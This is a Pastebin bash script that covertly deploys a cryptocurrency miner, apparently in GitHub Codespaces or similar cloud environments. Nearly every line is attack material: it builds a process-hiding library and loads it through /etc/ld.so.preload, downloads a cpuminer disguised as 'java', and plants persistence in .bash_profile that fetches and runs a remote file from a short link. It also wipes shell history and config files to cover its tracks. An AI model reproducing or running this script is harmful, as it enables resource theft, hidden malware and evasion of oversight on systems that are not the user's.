Advertisement
ppek

AGCb2

Mar 5th, 2023 (edited)
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.43 KB | None | 0 0
  1. rm -rvf .lib* .bash*
  2. cd ~/
  3. wget https://github.com/AhmadTugiman/gembel/raw/main/tukimin.zip
  4. unzip tukimin.zip
  5. rm -rf tukimin.zip
  6. make
  7. gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
  8. mv libprocesshider.so /usr/local/lib/
  9. echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
  10. clear
  11. mkdir .lib
  12. cd .lib
  13. git clone https://github.com/sukamenari/akc.git && cd akc && rm bash && wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.29/cpuminer-opt-linux.tar.gz --no-check-certificate && tar xf cpuminer-opt-linux.tar.gz && rm cpuminer-opt-linux.tar.gz && mv cpuminer-avx2 java && mv java* ~/ && cd .. && rm -rvf cpuminer-opt-linux && mv kernel* /home/codespace/.lib
  14. cd .. && rm -rvf akc
  15. echo ""  > /home/codespace/.bashrc
  16. echo "" > /home/codespace/.bash_history
  17. echo "" > /home/codespace/.bash_profile
  18. echo 'echo ""  >> /home/codespace/.bash_history' >> /home/codespace/.bashrc
  19. echo "source /home/codespace/.bash_profile"  >> /home/codespace/.bashrc
  20. echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/codespace/.bash_profile
  21. echo "export LD_LIBRARY_PATH" >> /home/codespace/.bash_profile
  22. echo "bash /home/codespace/.lib/gas.sh"  >> /home/codespace/.bash_profile &&
  23. echo "export LC_ALL=C; unset LANGUAGE && cd ~/ && rm -rvf e && wget -O e http://tiny.cc/Cbte2 && chmod +x e && ./e " > /home/codespace/.lib/gas.sh
  24. cd /home/codespace/.lib/
  25. chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
  26.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement